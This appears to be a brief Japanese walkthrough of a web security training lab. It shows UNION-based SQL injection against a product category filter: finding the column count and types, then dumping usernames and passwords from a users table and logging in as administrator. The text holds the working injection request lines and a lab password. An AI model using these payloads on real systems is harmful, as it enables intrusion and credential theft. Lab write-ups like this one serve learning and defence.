Hello there, ('ω')ノ

 

まずは、Petsを選択して。

 

 

リクエストをリピータへ。

 

 

はじめにレスポンスからデータのカラム数の模索を。

　GET /filter?category=Pets'+UNION+SELECT+NULL--

 

 

２つのデータカラムだと成功のレスポンスが。

　GET /filter?category=Pets'+UNION+SELECT+NULL,NULL--

 

 

ちなみに３つのデータカラムだとエラーが。

　GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--

 

 

次にデータ型の模索を。

　GET /filter?category=Pets'+UNION+SELECT+'abc',NULL--

 

 

１つ目のカラムは数値のようで。

　GET /filter?category=Pets'+UNION+SELECT+123,NULL--

 

 

２つ目のカラムは、文字列で。

　GET /filter?category=Pets'+UNION+SELECT+123,'abc'--

 

 

データベースには、usersというテーブルに。

usernameとpasswordの２つのカラムがあるとのことで。

文字列のカラムにはusernameとpasswordの２つのデータが含まれているようなので。

 

GET /filter?category=Pets'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

 

 

下記でログインすると。

　administrator/34b4wga8jpvbj20nx8da

 

 

クリアできた。

 

 

Best regards, (^^ゞ